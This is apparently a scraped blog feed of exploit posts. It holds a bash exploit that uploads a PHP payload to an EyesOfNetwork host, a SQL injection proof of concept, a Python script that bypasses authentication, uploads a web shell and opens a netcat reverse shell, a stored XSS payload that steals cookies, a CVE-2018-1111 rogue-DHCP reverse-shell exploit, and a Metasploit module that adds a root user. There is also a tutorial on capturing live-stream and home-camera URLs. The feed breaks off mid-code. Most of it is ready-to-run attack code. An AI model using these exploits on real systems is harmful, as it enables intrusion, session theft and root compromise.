name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \ $'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh chmod +x req.sh ./req.sh } #Get request on PHP exploit Req_payload() { echo "Get request on the PHP payload ..." echo "curl -i -s -k -X $'GET' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ $'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh chmod +x reqGET.sh ./reqGET.sh } #Clearing Clear_cache() { echo "clearing cache" rm listen.sh rm req.sh rm reqGET.sh rm GetSession.sh cd .. rmdir EON53 } #MAIN banner VAR GetSessionID start_listen Payload Req_payload Clear_cache
  19. HireHackking

    Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The 'person' parameter is vulnerable to time-based SQL Injection. ######## Proof of Concept ####### Payload: (select*from(select(sleep(10)))a) Using Burp Suite, send the following POST request: POST /marimar/index.php?p=booking HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/marimar/index.php?p=booking Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc Upgrade-Insecure-Requests: 1 arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
  20. HireHackking

    E-Learning System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE # Exploit Author: Himanshu Shukla & Saurav Shukla # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip # Version: 1.0 # Tested On: Kali Linux + XAMPP 7.4.4 # Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution #Step 1: run the exploit in python with this command: python3 exploit.py #Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/ #Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23 #Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444 #Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444 #Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter. import requests print('########################################################') print('## E-LEARNING SYSTEM 1.0 ##') print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##') print('########################################################') print('Author - Himanshu Shukla & Saurav Shukla') GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""} r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if("You login as Administrator." in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) #Creating a PHP Web Shell phpshell = { 'file': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/x-php', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''} #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False) shell_upload = True if("window.location='index.php'" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) print("[*]Please Input Reverse Shell Details") LHOST=input("[*]LHOST : ") LPORT=input("[*]LPORT : ") print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT) input('[*]Hit Enter if your netcat shell is ready. ') print('[+]Deploying The Web Shell...') #Executing The Webshell e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies) exit()
  21. HireHackking

    Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS # Exploit Author: Siva Rajendran # Date: 2020-12-31 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Windows 10, Firefox Version 84.0 Step 1. Go to sign up page Step 2. In the "Last Name" field, use the following XSS payload "><img src=xx onerror=alert(document.cookie)> as the name and click on save. Step 3. This should trigger the Stored XSS payload in admin panel users tab, once the admin login into the application to verify the registered users email address. The attacker steals the admin session cookie
  22. HireHackking

    Title: Crawl Douyin Kuaishou Camera Live Streaming

    HireHackking posted a blog entry in Hacker Technology
    In recent years, live broadcasts on various platforms have become increasingly popular. In life and production, we need some live broadcast scenarios. For example, the live streaming of Douyin and Kuaishou platforms are captured and played directly in real time in the network player. Can it be done? Let’s study with my cousin!http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20221028182552.gif Three common live broadcast protocols The RTMP protocol is designed for streaming media and is used more frequently in streaming. At the same time, most CDN manufacturers support the RTMP protocol. HTTP-FLV uses HTTP long connections similar to RTMP streaming and needs to be distributed by a specific streaming server, taking into account the advantages of both. and a streaming protocol that can reuse existing HTTP distribution resources. Its real-time performance is equal to RTMP, which saves some protocol interaction time compared to RTMP, has shorter first-screen time and more expandable functions. As a live broadcast protocol proposed by Apple, HLS occupies an unshakable position on the iOS side, and the Android side also provides corresponding support.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028182848.png?x-oss-process=style/gzh Get Douyin Kuaishou Live Streaming What if you get the live broadcast address of Douyin? We just need to use the traffic analysis tool to grab the URL containing the above protocol. First we find the current live broadcast to crawl. And share it as follows: http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028183449.png?x-oss-process=style/gzh Open the shared address in the browser, bing http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028183759.png?x-oss-process=style/gzh Then use the traffic analysis tool to grab the current data packet. Then, we search for the file format flv or m3u8 in the live broadcast protocol. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028184833.png?x-oss-process=style/gzh http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028184858.png?x-oss-process=style/gzh Right-click to copy the address. Then put it in the streaming media playback tool to test it. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185013.png?x-oss-process=style/gzhThe effects are as followshttp://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185059.png?x-oss-process=style/gzh In the same way, we can capture the live stream of Kuaishou B station. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185406.png?x-oss-process=style/gzh Crawl data http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185441.png?x-oss-process=style/gzh http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028185617.png?x-oss-process=style/gzh Use HTML display Now I encounter such a new problem. We got the live stream. But it can only be played through a streaming player. Can you play live videos through html? We know that in H5, the video tag is used to play videos. But it only parses common formats such as mp4 avi. However, formats such as flv m3u8 are not supported. How to solve it? Know flv.js A JavaScript library that implements playing FLV format videos in HTML5 videos. It works by multiplexing FLV file streams into ISO BMFF (MP4 fragment) fragments, and feeding the MP4 fragments into the browser via Media Source Extensions. flv.js only does one thing. After obtaining the audio and video data in FLV format, it decodes the FLV data through native JS, and then feeds the native HTML5 Video tags through the Media Source Extensions API. (HTML5 natively only supports playback mp4/webm format, not FLV) Code Example First, we need to introduce flv.js first script src='https://cdn.bootcss.com/flv.js/1.3.3/flv.js'/scripttml code is as follows: video width='300px' height='400px' id='videoElement' controls/video script if (flvjs.isSupported()) { var videoElement=document.getElementById('videoElement'); var flvPlayer=flvjs.createPlayer({ type: 'flv', url: 'https://pull-f3.douyincdn.com/third/stream-111864726937404075_hd.flv?abr_pts=-1800' }); flvPlayer.attachMediaElement(videoElement); flvPlayer.load(); flvPlayer.play(); } /script effect is as followshttp://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028190554.png?x-oss-process=style/gzh Crawl the camera live stream We also often use the cameras of attractions for live broadcasts. How did it be done? Here we take the home TPLink camera as an example. Share the device in the camera app and then grab the live stream. http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028191837.png?x-oss-process=style/gzh Catch data packets http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028191954.png?x-oss-process=style/gzh Test http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028192206.png?x-oss-process=style/gzh Summary In this issue, we will explain the crawling of the live video streaming protocol. The principle is also very simple, it is just to capture packets and filter live broadcast protocol flv m3u8.
  23. HireHackking

    タイトル:CVE-2018-1111ハイジャックDHCPは、CENTOSコードの実行の脆弱性を引き起こします

    HireHackking posted a blog entry in Hacker Technology
    0x01脆弱性の概要 最近、Red Hatはセキュリティアップデートを正式にリリースし、CVE-2018-1111の番号付けされたリモートコード実行の脆弱性を修正しました。攻撃者は、DHCPサーバーを偽造して応答パケットを送信し、Red Hatシステムを攻撃し、ルートアクセス許可を取得し、任意のコマンドを実行できます。 0x02影響バージョン Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux Server 7 Centos 6 Centos 7 0x03脆弱性の詳細 DHCPは、主に内部ネットワークでの動的IPアドレス割り当てに使用されるLANのネットワークプロトコルです。 Red Hatが提供するDHCPクライアントパッケージDHClientのスクリプトは/etc/networkmanager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)および/etc/networkmanager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);このスクリプトは、NetworkManagerコンポーネントがDHCPサーバーからDHCP応答を受信するときに実行されます。 単一の引用符を使用してパラメーター値を正常にエスケープし、コマンドの実行を実現します -dhcp-option='252、x'nc -e /bin /bash 10.1.1.1 1337#' 0x04脆弱性の再発 は、再現するときに注意してください。 1.両方の仮想マシンをホスト専用モードに設定する必要があります 2。ホストモードLS8 Z(D/M0〜J2 F9 LでDHCPサービスを無効にする 環境 攻撃航空機:Kali 2018.2 被害者マシン:Centos7 Tsinghua Mirror SiteでCentos 7をダウンロードします https://mirrors.tuna.tsinghua.edu.cn/centos/7.4.1708/isos/x86_64/centos-7-x86_64-dvd-1708.iso VMware12.0 ネットワークをセットアップ ここでは、VMware仮想マシンを使用して実装します。両方のシステムは、VMNET1ネットワークカード(ホストモードのみ)に接続され、ネットワークカードをオフにします。 DHCPサービス。 次に、kali、dnsmasqでDHCPサーバーの構成を開始します これは、DNSとDHCPを構成するためのコンパクトで便利なツールです。小さなネットワークに適しています。 DNS機能とオプションのDHCP機能を提供して、DNSサービスまたはDHCPサービスを迅速に構築します。 kali を構成します 最初に、Kaliの下でIPを静的に構成し、ルートを追加します。コマンドは次のとおりです。 ifconfig eth0 192.168.71.5netmask 255.255.255.0 ルートAddDefaultGW192.168.71.5 まず、DNSMasqで使用する必要がある構成ファイル /etc/dnsmasq.confを作成します。コンテンツは次のとおりです。 vim /etc/dnssmassq.conf バインドインターフェイス インターフェイス=eth0 Interface=loを除く DHCP-RANGE=192.168.71.10,192.168.71.30,22H DHCP-Option=3,192.168.131.5 DHCP-Option=6,192.168.131.5 ログQueries log-facility=/var/log/dnsmasq.log パラメーター説明: DHCP-RANGE:は、クライアントに割り当てるIPアドレスの範囲とリース時間を示します DHCP-OPTION:は、DHCPクライアントに割り当てられたオプション情報を示します log-facility:はロガーを表します 構成ファイルに含まれるオプションの値と意味は次のとおりです。 3:ゲートウェイアドレスオプションを設定します 6: DNSサーバーアドレスオプションを設定します 252:は、DHCPクライアントがプロキシ設定を構成するためのURLを提供しますwpad-proxy-url ペイロードに関与するオプション252は、DHCPサーバーに252を使用して、ブラウザでDHCPサーバーに通知する機能を記述し、このオプションにリストされているURLからネットワーク上のプロキシ設定に関する情報を取得するためにコード252を使用して、プライベート使用予約部品の一部です。 ここでは、dnsmasq.confにdhcp-rangeを設定します これは、192.168.71.10-192.168.71.30/24のIPアドレス範囲であり、リース時間は12時間です。 DHCP-Option 3ゲートウェイアドレスとDHCP-Option 6 DNSサーバーは、KaliローカルネットワークカードのIPアドレスに設定され、KaliのIPアドレスは静的IPです。 /etc/dnsmasq.conf構成ファイルを変更した後、DNSMASQサービスを直接開始することはできません。 DNSMASQを使用してDNSサーバーを偽造し、次のようにコマンドペイロードを実行します。 dnsmasq -dc dnsmasq.conf -dhcp-option='252、malayke'nc -e /bin /bash 192.168.71.5 6666#' ここで-dはデバッグモードを表し、-cは指定された構成ファイルを表し、DNSMASQサービスを実行します。 DNSMASQコマンドのより詳細な説明については、Man DNSMASQを使用して表示できます。 コマンド実行の効果は、NCを介してシェルを192.168.71.5のポート6666にバウンスすることです。したがって、KALIでNCポート監視を有効にする必要があります。コマンドは次のとおりです。 NC-L-P6666-V 攻撃 IPアドレスを取得してネットワークカードを再起動するためにDHCPにCentosを設定しました!現時点では、CentOSはネットワークサービスを再起動し、DHCPサーバーが発行したIPアドレスを取得する必要があります。ここでは、IPアドレスが取得されたことがわかります192.168.71.18 コマンドは次のとおりです。 /etc/init.d/network再起動 IPが取得されたことが示されています。ここKaliで何が起こったのか見てみましょう この時点で、KaliのNCでは、Centosシェルを取得でき、ルート許可があります 0x05脆弱性原理 単一の引用がスクリプトで逃げ出し、ルート許可を使用してスクリプトを直接実行しました。 dhcp-option=” 252、x’nc-e/bin/bash10.1.1.11337#” 0x06修復方法 #yum update dhclient #RPM -QA -CHANGELOG DHCLIENT |グレップ CVE-2018- Resolves:#1570898-CVE-2018-1111:を解析しないでください エスケープキャラクターとしてのバックスラッシュ ox7はexp を利用します #/usr/bin/python #encoding=utf-8 PWNインポートから * OSをインポートします sysをインポートします インポート時間 #著者: xyzz@chamd5.org #時間: 20180520 IP='192.168.131.52' ポート=1314 #context.log_level='debug' DEF PWN(IP、ポート): f=open( 'dnsmasq.conf'、 'w') start=ip [:ip.rfind( '。')]+'。10' end=ip [:ip.rfind( '。')]+'。30' dnsmasq='' ' バインドインターフェイス インターフェイス=eth0 Interface=loを除く dhcp-range={start}、{end}、22h dhcp-option=3、{ip} dhcp-option=6、{ip} ログQueries log-facility=/var/log/dnsmasq.log '' .format(ip=ip、start=start、end=end) f.write(dnsmasq) f.close() cm=[] cm.append( 'ifconfig eth0 {ip} netmask 255.255.255.0' .format(ip=ip))) cm.append( 'ルート追加gw {ip}'。フォーマット(ip=ip)) cm.append( '' 'dnsmasq -dc dnsmasq.conf -dhcp-option='252、' nc -e /bin /bash {ip} {port} # '' '。フォーマット(ip=ip、port=port)) q=process( 'bash') 範囲のi(len(cm)-1):の場合 Q.sendline(cm [i]) time.sleep(1) #time.sleep(100) p=process( 'bash') p.sendline( 'nc -l -p {port} -v'.format(port=port)) Q.Sendline(CM [-1]) time.sleep(3) p.interactive() #q.interactive() __name__=='__main __' :の場合 PWN(IP、ポート)
  24. HireHackking

    Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , 'Description' => %q{ This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, can be performed without the need for any session(cookie) information. Therefore, the session cookie informations of the active users in the application can be read from the response content. A new authorized user can be created with the obtained cookie. }, 'References' => [ [ 'CVE', '' ], [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], [ 'URL', 'https://www.netsia.com' ] ], 'Author' => [ 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus ], 'License' => MSF_LICENSE, 'DisclosureDate' => "2021-01-06", 'DefaultOptions' => { 'SSL' => true } )) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [true, 'The username for your new account']), OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) ]) end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end def check begin res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) rescue return Exploit::CheckCode::Unknown end if res.code == 200 and res.body.include? 'sessionId' return Exploit::CheckCode::Vulnerable else if res.code == 200 and res.body.include? 'SUCCESS' print_status("Target is vulnerable! But active admin session was not found. Try again later.") return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe end def count_user(data, find_string) data.scan(/(?=#{find_string})/).count end def run unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) sescount = count_user(res.body,'"name"') print_good("Currently #{sescount} active sessions have been detected.") cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) puts cookies $i = 0 while $i <= sescount do sessloop = cookies[$i] sessid = "SESSION=" + sessloop.to_s cookie = sessid.split('"]').join('').split('["').join('') $i +=1 json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", 